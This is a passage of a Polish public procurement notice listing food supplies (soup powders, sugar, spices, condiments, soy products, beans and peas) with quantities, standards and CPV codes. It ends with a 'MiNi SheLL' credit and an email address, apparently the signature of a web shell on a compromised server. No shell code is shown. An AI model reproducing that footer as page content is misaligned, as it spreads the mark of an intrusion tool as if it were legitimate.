-  termin przydatności do spożycia - 
6 m-cy od daty dostawy PN-A-86967	_____	1010 kg	_____	1010 kg
8. Zupa pieczarkowa w proszku 
- opakowania od 5 - 35 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy PN-A-94050:1996 _____ 58 kg	_____	58 kg
9.Leczo pieczarkowe w słoikach
- opakowanie od 3 do 4,2 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy PN-A-86951:2006	_____	910 kg	_____	910 kg
10.Bulion z kury w proszku
- opakowania od 5 - 35 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy PN-A-94052:1996	_____1370 kg_____1370 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.20.00-7, 15.89.15.00-5, 15.89.14.00-4, 15.89.00.00-3, 15.87.12.70-7, 15.33.10.00-7, 15.89.15.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CUKIER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu	 Norma	Ilość ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Cukier biały kryształ:
- opakowanie max. do 25 kg
- termin przydatności do spożycia - 
co najmniej 6 m-cy od daty dostawyPN-A-74850  3000 kg  3980 kg 750 kg 7730 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RÓŻNE ARTYKUŁY SPOŻYWCZE I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Cukier waniliowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia 
- 6 m-cy od daty dostawy;	BN-79-8133-01	50 kg	_____	______	50 kg
2.Chrupki kukurydziane:
-opakowanie od 0,08 kg do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;PN-A-88036:1998	200 kg	_____	______	200 kg
3.Curry w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; PN-R-87022	20 kg	2 kg	8 kg	30 kg
4.Biszkopty:
- opakowanie - do 1 kg;
- termin przydatności do spożycia -
 6 m-cy od daty dostawy; PN-A-88115:1998	150 kg	_____	_____	150 kg
5.Budyń:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; PN-A-94051	200 kg	______	______	200 kg
6.Czosnek granulowany:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; PN-A-86967	 30 kg	5 kg	_____	35 kg
7.Galaretka niskosłodzona:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia -
 6 m-cy od daty dostawy;  PN-94/A-75104 100 kg __ ___100 kg
8.Herbata granulowana:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; PN-ISO 3720 800 kg	280 kg	60 kg	1140 kg
9.Kawa zbożowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy; PN-A-94013	1 700 kg	490 kg	115 kg	2305 kg
10.Kisiel:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;PN-A-94051	200 kg	100 kg	_____	300 kg
11.Kwasek cytrynowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-81/A-79734     50 kg  20 kg	_____	70 kg
12. Liść laurowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-R-87022	40 kg 20 kg	8 kg	68 kg
13.Majeranek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86958	40 kg
30 kg 8 kg 78 kg
14.Majonez:
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86950:1995 900 kg	_____	25 kg	925 kg
15.Musztarda;
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86964 1200 kg 130 kg	35 kg	1365 kg
16. Ocet 10% 0,5 l	  PN-72/A-79733	500 l	200 l	36 l	736l
17.Papryka mielona ostra:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-86955	20 kg
40 kg	8 kg	68 kg
18.Pieprz czarny mielony:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86965	100 kg
50 kg	17 kg	167 kg
19.Proszek do pieczenia:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-94017:1998 20 kg____	____	20 kg
20.Sól kuchenna:
-opakowanie - do 1 kg;
-termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-C-84081	3 500 kg	1060 kg	270 kg	4830 kg
21.Ziele angielskie:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; BN-67/8132-14 40 kg 20 kg	15 kg	75 kg
22.Żelatyna spożywcza:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-82245:1993  50 kg _____  ______	50 kg
23.Bazylia suszona
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-86959:1997 _____ 4 kg____ 4 kg
24.Chilli mielone
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86967 	_____ 2 kg	____	2 kg
25.Cynamon mielony
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy BN-68-8132-09 ______	1 kg	_____	1 kg
26.Kminek 
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-86953 ______  4 kg	_____	4 kg
27.Oregano suszone
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-86967	_____
4 kg	____	4 kg
28.Papryka słodka mielona
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy	PN-A-86955 ______	40 kg	____	40 kg
29.Przyprawa do mięsa mielonego
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-86967	______
6 kg	_____	6 kg
30.Zioła prowansalskie 
- opakowanie - do 0,5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-86967 _______ 2 kg ____ 2 kg
31. Chrzan tarty
- opakowanie - do 0,9 kg
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-R-75520:1993 ______	80 kg	____	80 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.61.33.11-1, 15.87.12.00-6, 15.88.20.00-4, 15.62.00.00-0, 15.87.10.00-4, 15.83.31.00-7, 15.86.30.00-5, 15.86.10.00-1, 15.89.00.00-3, 15.87.20.00-1, 15.87.12.73-8, 15.87.12.50-1, 15.87.11.20-1, 15.87.21.00-2, 15.89.90.00-6, 15.87.24.00-5, 15.87.00.00-7, 15.89.20.00-7, 15.87.22.00-3, 15.87.23.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRODUKTY SOJOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość ZK nr 1	ZK Nr 2	AŚ	RAZEM
1.Granulat sojowy:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-ISO 5506	600 kg
55 kg	70 kg	725 kg
2.Kostka sojowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-ISO 5506	500 kg
85 kg	30 kg	615 kg
3.Kotlet sojowy
- opakowanie - 1 kg - 30 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-ISO 5506 ____	80 kg	20 kg	100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PRODUKTY STRĄCZKOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa artykułu	Norma	Ilość ZK Nr 1	ZK Nr 2	AŚ	RAZEM
1.Fasola JAŚ średni;
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-75/R-65031 2 500 kg	1225 kg	190 kg	3915 kg
2.Groch łuskany:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-74220:1997    2 500 kg	680 kg	90 kg	3270 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.30-7, 15.31.11.33-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com